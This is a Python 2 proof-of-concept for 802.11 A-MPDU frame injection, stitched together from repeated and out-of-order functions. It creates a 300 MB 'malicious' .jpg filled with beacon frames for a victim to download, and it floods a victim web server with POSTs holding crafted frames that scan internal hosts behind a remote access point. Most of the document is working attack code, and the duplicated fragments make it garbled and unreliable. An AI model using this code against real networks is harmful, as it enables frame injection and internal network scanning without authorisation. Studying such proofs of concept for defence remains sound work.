def get_entry(self, client_ip):
self.mutex.acquire()
try:
temp = self.arp_table[client_ip]
except KeyError:
temp = None
printd("Could not find IP %s in ARP table." % client_ip, Level.WARNING)
self.mutex.release()
return temp
def get(self, key, default=None):
value = None
try:
value = ConfigParser.get(self, 'fakeap', key)
except NoOptionError as e:
value = default
printd("Option '%s' not specified in config file. Using default." % e.option, Level.WARNING)
printd("%s -> %s" % (key, value), Level.INFO)
return value
def get(self, key, default=None):
value = None
try:
value = ConfigParser.get(self, 'fakeap', key)
except NoOptionError as e:
value = default
printd(
"Option '%s' not specified in config file. Using default." %
e.option, Level.WARNING)
printd("%s -> %s" % (key, value), Level.INFO)
return value
def main_download():
# Malicious download
raw_input("This will create a 300 MB file download.jpg in the working directory. Press any key to continue or CTRL+C to exit.")
printd(clr(Color.YELLOW, "Creating malicious download..."), Level.INFO)
container = ""
for i in range(0, 256):
# Containers are (series of) frames to inject into the remote network
# Container for scanning hosts on internal network
#md_pkt = AMPDUPacket('ff:ff:ff:ff:ff:ff', '4C:5E:0C:9E:82:19', '4C:5E:0C:9E:82:19', 0x02)
#md_pkt.add_msdu(ping_packet(i, "10.0.0.1", "192.168.88.249"))
#md_pkt.add_padding(8)
# Container for a Beacon frame
md_pkt = ssid_packet()
container += str(md_pkt)
md = MaliciousDownload(container)
md.write()
def add_msdu(self, msdu, msdu_len=-1):
# Default msdu len
if msdu_len == -1:
msdu_len = len(msdu)
mpdu_len = len(self.dot11hdr) + msdu_len + 4 # mac80211 + msdu + FCS
# print the length of the padding
print 'MPDU length: ', mpdu_len
if mpdu_len % 4 != 0:
frame_padding = "\x00" * (4 - (mpdu_len % 4)) # Align to 4 octets
printd("Padding added: ", Level.INFO)
for character in str(frame_padding):
print "\\x", character.encode('hex'),
printd("", Level.INFO)
else:
frame_padding = ""
printd("No padding added", Level.INFO)
sys.stdout.flush()
mpdu_len <<= 4
crc_fun = crcmod.mkCrcFun(0b100000111,
rev=True,
initCrc=0x00,
xorOut=0xFF)
crc = crc_fun(struct.pack('<H', mpdu_len))
maccrc = dot11crc(str(self.dot11hdr / msdu))
# the packet alreacy contains the 'rt' and the 'dot11hdr', so I add the other things
self.data = self.data / msdu / maccrc / frame_padding
def main():
session = requests.Session()
count = 1
ip_count = 0
printd(clr(Color.BLUE, "Building container..."), Level.INFO)
""" Build container """
container = ''
for i in range(0, 800):
count = (count + 1) % 1024
ip_count = (ip_count % 255) + 1
# Ping from attacker --> victim
# You need to change the MAC addresses and IPs to match the remote AP
ampdu_pkt = AMPDUPacket('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B', '64:D1:A3:3D:26:5B', 0x02)
ampdu_pkt.add_msdu(ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count)))
ampdu_pkt.add_padding(8)
container += str(ampdu_pkt)
# Beacon from attacker --> victim
#ampdu_pkt = ssid_packet()
#container += str(ampdu_pkt)
# Ping from victim --> access point
#ampdu_pkt = AMPDUPacket('4C:5E:0C:9E:82:19', 'f8:1a:67:1b:14:00', '4C:5E:0C:9E:82:19')
#ampdu_pkt.add_msdu(ping_packet(count, "192.168.88.254", "10.0.0." + str(ip_count)))
#ampdu_pkt.add_padding(8)
#container += str(ampdu_pkt)
""" end package """
printd(clr(Color.BLUE, "Finished building container! Sending..."), Level.INFO)
while 1:
print("."),
sys.stdout.flush()
request_params = {'postpayload': ("\x00" * random.randint(0, 3)) + str(container)}
try:
session.post("http://" + "10.0.0.6:80" + "/index.html", files=request_params, timeout=5)
except requests.exceptions.ConnectionError:
printd(clr(Color.RED, "Could not connect to host"), Level.CRITICAL)
pass
except Exception:
printd(clr(Color.RED, "Another exception"), Level.CRITICAL)
pass
def add_msdu(self, msdu, msdu_len=-1):
# Default msdu len
if msdu_len == -1:
msdu_len = len(msdu)
mpdu_len = len(self.dot11hdr) + msdu_len + 4 # mac80211 + msdu + FCS
# print the length of the padding
print 'MPDU length: ', mpdu_len
if mpdu_len % 4 != 0:
frame_padding = "\x00" * (4 - (mpdu_len % 4)) # Align to 4 octets
printd("Padding added: ", Level.INFO)
for character in str(frame_padding):
print "\\x", character.encode('hex'),
printd("", Level.INFO)
else:
frame_padding = ""
printd("No padding added", Level.INFO)
sys.stdout.flush()
mpdu_len <<= 4
crc_fun = crcmod.mkCrcFun(0b100000111,
rev=True,
initCrc=0x00,
xorOut=0xFF)
crc = crc_fun(struct.pack('<H', mpdu_len))
maccrc = dot11crc(str(self.dot11hdr / msdu))
delim_sig = 0x4E
#print('a-mpdu: len %d crc %02x delim %02x' % (mpdu_len >> 4, crc, delim_sig))
#hexdump(maccrc)
ampdu_header = struct.pack(
'<HBB', mpdu_len, crc, delim_sig
) #'pack' returns a string containing the given values, packed according to the given format
#hexdump(ampdu_header)
self.data = self.data / ampdu_header / self.dot11hdr / msdu / maccrc / frame_padding
self.num_subframes += 1
print("."),
sys.stdout.flush()
request_params = {'postpayload': ("\x00" * random.randint(0, 3)) + str(container)}
try:
session.post("http://" + "10.0.0.6:80" + "/index.html", files=request_params, timeout=5)
except requests.exceptions.ConnectionError:
printd(clr(Color.RED, "Could not connect to host"), Level.CRITICAL)
pass
except Exception:
printd(clr(Color.RED, "Another exception"), Level.CRITICAL)
pass
if __name__ == "__main__":
try:
pocnum = raw_input("Two PoCs are available. Suggested approach to test the vulnerability is to choose option 1"
" and upload the file to your web server. Then, download while connected to an _open_ "
"network and observe Wireshark output for MAC 00:00:00:00:00:00 in monitor mode. Waving "
"your hand over the antenna of the receiver can speed up the injection rate if you don't "
"want to wait too long to see the results.\n"
"\t1) Generate 300 MB .jpg file containing malicious Beacon frames (pulled by victim).\n"
"\t2) Connect to victim web server and POST malicious host scanning ICMP frames (push to victim).\n"
"Note: for option 2 you need to change the MAC addresses and IPs in the source to match the remote AP.\n"
"Choice: ")
if pocnum == "1":
main_download()
elif pocnum == "2":
main()
else:
printd("Invalid PoC number.", Level.CRITICAL)
except KeyboardInterrupt:
printd("\nExiting...", Level.INFO)
def dump_to_file(self):
with open('ampdu.bin', 'w') as f:
printd(clr(Color.YELLOW, "Dumped garbage packet"), Level.INFO)
f.write(str(self) * 250)
def dump_to_file(self):
with open('ampdu.bin', 'w') as f:
printd(clr(Color.YELLOW, "Dumped garbage packet"), Level.INFO)
f.write(str(self) * 250)
def main():
count = 1
ip_count = 1
# send the packet a number of times
for i in range(0, 10):
count = (count + 1) % 1024
ip_count = (ip_count % 255) + 1
# Ping from attacker --> victim
# You need to change the MAC addresses and IPs to match the remote AP
pkt = Dot11Packet('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B',
'64:D1:A3:3D:26:5B')
printd(clr(Color.YELLOW, "Radiotap:"), Level.INFO)
#sys.stdout.flush()
hexdump.hexdump(str(pkt.rt))
#for character in str(pkt.rt):
# this prints "\x 00 \x 00 \x 12 \x 00 \x 2e \x 08 \x 00 \x 00 \x 00 \x 6c \x 6c \x 09 \x c0 \x 00 \x c0 \x 01 \x 00 \x 00 "
#print '\\x',character.encode('hex'),
sys.stdout.flush()
printd("", Level.INFO) #print a linefeed
printd(clr(Color.YELLOW, "802.11 hdr:"), Level.INFO)
#sys.stdout.flush()
hexdump.hexdump(str(pkt.dot11hdr))
sys.stdout.flush()
# add an MSDU
pkt.add_msdu(
ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count)))
printd(clr(Color.YELLOW, "MSDU added:"), Level.INFO)
#sys.stdout.flush()
hexdump.hexdump(
str(ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count))))
sys.stdout.flush()
printd(clr(Color.YELLOW, "Radiotap + 802.11 hdr + MSDU + CRC:"),
Level.INFO)
#sys.stdout.flush()
hexdump.hexdump(str(pkt.data))
sys.stdout.flush()
#for character in str(pkt.data):
# this prints "\x 80 \x 04 \x bb \x 4e \x 88 \x 02 \x 00 \x 00 \x ff \x ff \x ff \x ff \x ff \x ff \x 64 "
#print "\\x",character.encode('hex'), #does not work in python3
#print character, character.encode('hex'),
printd("", Level.INFO) #print a linefeed
# send the packet
pkt.send() #the interface has to be in monitor mode
printd("packet sent", Level.INFO)
time.sleep(0.1)
def main_ampdu():
# "Requests" Python library: http://docs.python-requests.org/en/master/user/advanced/
#session = requests.Session()
count = 1
ip_count = 0
printd(clr(Color.BLUE, "Building container..."), Level.INFO)
""" Build container """
container = ''
for i in range(0, 2):
count = (count + 1) % 1024
ip_count = (ip_count % 255) + 1
# Ping from attacker --> victim
# You need to change the MAC addresses and IPs to match the remote AP
ampdu_pkt = AMPDUPacket('ff:ff:ff:ff:ff:ff', '64:D1:A3:3D:26:5B',
'64:D1:A3:3D:26:5B', 0x02)
printd(clr(Color.YELLOW, "Radiotap (rt):"), Level.INFO)
#sys.stdout.flush()
hexdump.hexdump(str(ampdu_pkt.rt))
for character in str(ampdu_pkt.rt):
# this prints "\x 00 \x 00 \x 12 \x 00 \x 2e \x 08 \x 00 \x 00 \x 00 \x 6c \x 6c \x 09 \x c0 \x 00 \x c0 \x 01 \x 00 \x 00 "
print "\\x", character.encode('hex'), #does not work in python3
sys.stdout.flush()
printd("", Level.INFO) #print a linefeed
printd(clr(Color.YELLOW, "dot11hdr:"), Level.INFO)
#sys.stdout.flush()
hexdump.hexdump(str(ampdu_pkt.dot11hdr))
sys.stdout.flush()
# add an MSDU to the AMPDU
ampdu_pkt.add_msdu(
ping_packet(count, "10.0.0.1", "192.168.0." + str(ip_count)))
printd(clr(Color.YELLOW, "AMPDU with the MSDU added:"), Level.INFO)
#sys.stdout.flush()
hexdump.hexdump(str(ampdu_pkt))
sys.stdout.flush()
ampdu_pkt.add_padding(8)
printd(
clr(Color.YELLOW,
"AMPDU with MSDU and 8 padding delimiters added:"), Level.INFO)
#sys.stdout.flush()
hexdump.hexdump(str(ampdu_pkt))
sys.stdout.flush()
container += str(ampdu_pkt)
# Beacon from attacker --> victim
#ampdu_pkt = ssid_packet()
#container += str(ampdu_pkt)
# Ping from victim --> access point
#ampdu_pkt = AMPDUPacket('4C:5E:0C:9E:82:19', 'f8:1a:67:1b:14:00', '4C:5E:0C:9E:82:19')
#ampdu_pkt.add_msdu(ping_packet(count, "192.168.88.254", "10.0.0." + str(ip_count)))
#ampdu_pkt.add_padding(8)
#container += str(ampdu_pkt)
""" end package """
printd(clr(Color.BLUE, "Final A-MPDU built:"), Level.INFO)
sys.stdout.flush()
#hexdump.hexdump('\x00'*16)
#hexdump.hexdump("Hello world")
hexdump.hexdump(container)
sys.stdout.flush()
for character in container:
# this prints "\x 80 \x 04 \x bb \x 4e \x 88 \x 02 \x 00 \x 00 \x ff \x ff \x ff \x ff \x ff \x ff \x 64 "
print "\\x", character.encode('hex'), #does not work in python3
#print character, character.encode('hex'),
printd("", Level.INFO) #print a linefeed
# send the packet a number of times
for i in range(0, 10):
# send the packet
ampdu_pkt.send() #the interface has to be in monitor mode
printd("packet sent", Level.INFO)
time.sleep(0.1)
"""
